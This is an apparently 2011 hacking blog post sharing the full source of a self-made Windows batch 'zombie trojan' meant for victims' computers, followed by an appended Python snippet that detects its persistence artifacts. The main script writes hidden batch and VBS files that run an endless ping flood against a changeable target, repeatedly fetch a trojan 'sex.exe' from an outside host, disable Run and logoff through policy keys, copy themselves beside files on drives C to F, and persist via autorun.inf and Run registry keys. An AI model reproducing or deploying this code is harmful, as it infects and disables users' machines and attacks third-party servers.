
Tuesday, 07 June 2011

ZOMBIE trojan

I made this thread once before, but it got deleted, maybe because of the attack on hn back then.
Hmm, OK, I just want to share the zombie I made.
[quote]
      ----------------------ATTENTION----------------------
1. Never try this on your own computer, because this zombie is meant for the victim's computer.
So it has to be spread to other people's computers, which become the hosts this zombie runs on.

2. It works very simply: one click and the zombie runs.
The effect can be seen once the computer has been shut down or logged off.

3. When the computer comes back up from a logoff or shutdown, this zombie creates 2 child zombies, 1 worm, an autorun, and 1 supporting file to run the 2 zombies and the 1 worm.

Child zombie 1, named boot.bat,
attacks the IP 192.168.1.1.
The IP can be changed to whatever website you want to attack.

Child zombie 2, named 736F686169207761732068657265.bat,
serves to download my trojan server file,
which can be accessed at http://h1.ripway.com/hack02/sex.exe
If you have your own trojan server file, it can be added.

Finally, 1 worm for spreading and defense.
[/quote]

So here is the script code.
code:
::Prompt di baca off:: echo off ::Memberi judul prompt:: title 736F686169207761732068657265 ::Memberi warna background hitam dan tulisan hijau muda:: color 0a ::Menghapus layar Prompt:: cls ::Membuat anakan 1 dengan nama wxhshell.vbs : echo Set wshshell = wscript.CreateObject("WScript.Shell") >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "cmd" >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys "echo off " >>C:\windows\system32\wxhshell.vbs echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys "color 0a " >>C:\windows\system32\wxhshell.vbs echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys "Title sohai was here " >>C:\windows\system32\wxhshell.vbs echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys "mode 33,10 " >>C:\windows\system32\wxhshell.vbs echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys "cls " >>C:\windows\system32\wxhshell.vbs echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys "::Your" >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys " Computer" >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys " Is" >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys " Not" >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys " Secure::" >>C:\windows\system32\wxhshell.vbs echo Wshshell.SendKeys "{ENTER}" 
>>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys "::I " >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys "Will" >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys " Attacking" >>C:\windows\system32\wxhshell.vbs echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys " Your" >>C:\windows\system32\wxhshell.vbs echo wshshell.sendkeys " Gateway::" >>C:\windows\system32\wxhshell.vbs echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "C:\windows\system32\boot.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "C:\windows\system32\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "C:\boot.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "D:\boot.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "E:\boot.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "F:\boot.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "C:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "D:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "E:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "F:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "C:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "D:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "E:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs echo Wshshell.run "F:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs ::Membuat anakan Zombie 1 dengan nama boot.bat dan memmiliki fungsi untuk DDOS:: echo echo off >>C:\windows\system32\boot.bat echo title 0x44444F5320762C736F686169 >>C:\windows\system32\boot.bat echo mode 67,16 
>>C:\windows\system32\boot.bat echo color 0c >>C:\windows\system32\boot.bat echo cls >>C:\windows\system32\boot.bat echo :DDOS >>C:\windows\system32\boot.bat echo echo Attacking Server 192.168.1.1 >>C:\windows\system32\boot.bat echo ping [color=#FF0000]192.168.1.1[/color] -i 100000 -t >nul >>C:\windows\system32\boot.bat echo goto DDOS >>C:\windows\system32\boot.bat ::Membuat anakan Zombie 2 dengan nama 736F686169207761732068657265.bat tolong bahasa hexa ini JANGAN di ubah:: echo echo off >>C:\windows\system32\736F686169207761732068657265.bat echo color 0a >>C:\windows\system32\736F686169207761732068657265.bat echo cls >>C:\windows\system32\736F686169207761732068657265.bat echo :736F686169207761732068657265 >>C:\windows\system32\736F686169207761732068657265.bat ::connect ke ripway untuk mendownload file sex.exe:: echo start firefox "[color=#FF0000]http://h1.ripway.com/hack02/sex.exe[/color]" >>C:\windows\system32\736F686169207761732068657265.bat echo goto 736F686169207761732068657265 >>C:\windows\system32\736F686169207761732068657265.bat ::Membuat pertahanan untuk worm 7461737961.bat berbentuk folder:: MD\\.\\C:\CON MD\\.\\D:\CON MD\\.\\E:\CON MD\\.\\F:\CON ::membuat pertahhanan untuk zombie2 berbentuk folder aux:: MD\\.\\C:\aux MD\\.\\D:\aux MD\\.\\E:\aux MD\\.\\F:\aux ::Membuat Worm1 di tambah fungsi manipulasi regedit,dan penyebaran:: echo echo off >>C:\CON\7461737961.bat echo cls >>C:\CON\7461737961.bat echo color oa >>C:\CON\7461737961.bat ::Fungsi manipulasi:: echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoRun" /t REG_DWORD /d 00000001 >>C:\CON\7461737961.bat echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoLogOff" /t REG_BINARY /d 01000000 >>C:\CON\7461737961.bat echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoStartMenuMorePrograms" /t REG_DWORD /d 00000001 >>C:\CON\7461737961.bat echo REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /d "S.O.H.A.I Was Here" /f >>C:\CON\7461737961.bat echo REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /d "Hack by S.O.H.A.I" >>C:\CON\7461737961.bat ::Penyebaran:: echo For /R C":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat echo For /R D":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat echo For /R E":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat echo For /R F":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat ::Membuat C:\windows\system32\boot.bat tercopy pada drive C D E F :: copy "C:\windows\system32\boot.bat" "C:\boot.bat" copy "C:\windows\system32\boot.bat" "D:\boot.bat" copy "C:\windows\system32\boot.bat" "E:\boot.bat" copy "C:\windows\system32\boot.bat" "F:\boot.bat" ::Membuat C:\CON\7461737961.bat tercopy pada folder CON D E F :: copy "C:\CON\7461737961.bat" "D:\CON\7461737961.bat" copy "C:\CON\7461737961.bat" "E:\CON\7461737961.bat" copy "C:\CON\7461737961.bat" "F:\CON\7461737961.bat" ::Membuat C:\CON\7461737961.bat tercopy pada folder aux D E F :: copy "C:\windows\system32\736F686169207761732068657265.bat" "C:\aux\736F686169207761732068657265.bat" copy "C:\windows\system32\736F686169207761732068657265.bat" "D:\aux\736F686169207761732068657265.bat" copy "C:\windows\system32\736F686169207761732068657265.bat" "E:\aux\736F686169207761732068657265.bat" copy "C:\windows\system32\736F686169207761732068657265.bat" "F:\aux\736F686169207761732068657265.bat" :::membuat C:\windows\system32\736F686169207761732068657265.bat tercopy pada folder C D E F :: copy "C:\windows\system32\736F686169207761732068657265.bat" "C:\aux\736F686169207761732068657265.bat" copy "C:\windows\system32\736F686169207761732068657265.bat" "D:\aux\736F686169207761732068657265.bat" copy "C:\windows\system32\736F686169207761732068657265.bat" "E:\aux\736F686169207761732068657265.bat" copy 
"C:\windows\system32\736F686169207761732068657265.bat" "F:\aux\736F686169207761732068657265.bat" ::Membuat boot.bat , 736F686169207761732068657265.bat dan 7461737961.bat pada drive C terhidden :: Attrib +r +h C:\windows\system32\boot.bat Attrib +r +h C:\windows\system32\736F686169207761732068657265.bat Attrib +r +h C:\CON\7461737961.bat Attrib +r +h D:\CON\7461737961.bat Attrib +r +h E:\CON\7461737961.bat Attrib +r +h F:\CON\7461737961.bat Attrib +r +h C:\boot.bat Attrib +r +h D:\boot.bat Attrib +r +h E:\boot.bat Attrib +r +h F:\boot.bat Attrib +r +h C:\aux\736F686169207761732068657265.bat Attrib +r +h D:\aux\736F686169207761732068657265.bat Attrib +r +h E:\aux\736F686169207761732068657265.bat Attrib +r +h F:\aux\736F686169207761732068657265.bat ::Membuat file autorun.inf di drive C dan memiliki Arti = Virus Membuat File Autorun Agar Virus bisa Berjalan Secara Otomatis:: echo [Autorun] >> C:\autorun.inf echo shellexecute=boot.bat >> C:\autorun.inf ::Mengcopy salinan autorun.inf pada drive C ke semua drive D E F:: Copy "C:\autorun.inf" "D:\autorun.inf" Copy "C:\autorun.inf" "E:\autorun.inf" Copy "C:\autorun.inf" "F:\autorun.inf" ::Membuat file autorun ter hidden dari drive C D E F :: Attrib +r +h C:\autorun.inf Attrib +r +h D:\autorun.inf Attrib +r +h E:\autorun.inf Attrib +r +h F:\autorun.inf ::Proses auto running file zombie dan worm:: reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v wxhshell /t REG_SZ /d C:\windows\system32\wxhshell.vbs /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot /t REG_SZ /d C:\windows\system32\boot.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot1 /t REG_SZ /d C:\boot.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot2 /t REG_SZ /d D:\boot.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot3 /t REG_SZ /d E:\boot.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot4 /t REG_SZ /d F:\boot.bat /f reg add 
HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F686169207761732068657265 /t REG_SZ /d C:\windows\system32\736F686169207761732068657265.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572651 /t REG_SZ /d C:\aux\736F686169207761732068657265.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572652 /t REG_SZ /d D:\aux\736F686169207761732068657265.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572653 /t REG_SZ /d E:\aux\736F686169207761732068657265.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572654 /t REG_SZ /d F:\aux\736F686169207761732068657265.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 7461737961 /t REG_SZ /d C:\CON\7461737961.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379612 /t REG_SZ /d D:\CON\7461737961.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379613 /t REG_SZ /d E:\CON\7461737961.bat /f reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379614 /t REG_SZ /d F:\CON\7461737961.bat /f
ATTENTION: IF A COMPUTER HAS ALREADY BEEN HIT BY THIS ZOMBIE, SO FAR I HAVE ONLY MADE A REMOVER FOR THE ZOMBIE; THE WORM HAS NOT BEEN THOUGHT ABOUT YET. http://sohai.byethost4.com
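A triage check for the persistence artifacts this post describes (Run-key values pointing at scripts, folders named after reserved DOS devices such as CON and aux, hex-encoded file names, and an autorun.inf with shellexecute), as an added example that is not part of the original post. The `reg query` output and autorun.inf text below are constructed samples, and all function names are hypothetical.

```python
import re
from pathlib import PureWindowsPath

# Reserved DOS device names; Explorer cannot open or delete folders named like this.
RESERVED = {"CON", "PRN", "AUX", "NUL"} | {f"{d}{i}" for d in ("COM", "LPT") for i in range(1, 10)}
SCRIPT_EXT = {".bat", ".cmd", ".vbs", ".js"}

def decode_hex_name(stem):
    """Return the text if a file stem is hex-encoded printable ASCII, else None."""
    if len(stem) < 8 or len(stem) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", stem):
        return None
    raw = bytes.fromhex(stem)
    return raw.decode("ascii") if all(32 <= b < 127 for b in raw) else None

def flag_path(path):
    """List the reasons an autostart target path looks suspicious."""
    p = PureWindowsPath(path.strip('"'))
    reasons = []
    if p.suffix.lower() in SCRIPT_EXT:
        reasons.append("script file as autostart target")
    if any(part.upper() in RESERVED for part in p.parts[:-1]):
        reasons.append("reserved device name used as folder")
    decoded = decode_hex_name(p.stem)
    if decoded:
        reasons.append(f"hex-encoded name decodes to {decoded!r}")
    return reasons

def parse_reg_query(text):
    """Map value name -> data from `reg query` output rows: name  REG_SZ  data."""
    rows = re.findall(r"(?m)^[ \t]+(\S.*?)[ \t]+REG_(?:EXPAND_)?SZ[ \t]+(.+)$", text)
    return {name: data.strip() for name, data in rows}

def autorun_targets(inf_text):
    """Return the commands an autorun.inf would launch (open= / shellexecute=)."""
    return [t.strip() for t in re.findall(r"(?im)^[ \t]*(?:open|shellexecute)[ \t]*=[ \t]*(.+)$", inf_text)]

# Constructed sample input (not captured from a real host); names taken from the post.
SAMPLE_RUN = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    wxhshell    REG_SZ    C:\windows\system32\wxhshell.vbs
    7461737961    REG_SZ    C:\CON\7461737961.bat
"""
SAMPLE_INF = "[Autorun]\nshellexecute=boot.bat\n"

def triage(run_text, inf_text):
    hits = {name: flag_path(data) for name, data in parse_reg_query(run_text).items()}
    hits.update({f"autorun.inf:{t}": flag_path(t) for t in autorun_targets(inf_text)})
    return {k: v for k, v in hits.items() if v}
```

Calling `triage(SAMPLE_RUN, SAMPLE_INF)` returns only the flagged entries with their reasons; the benign `SecurityHealth` row is dropped.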
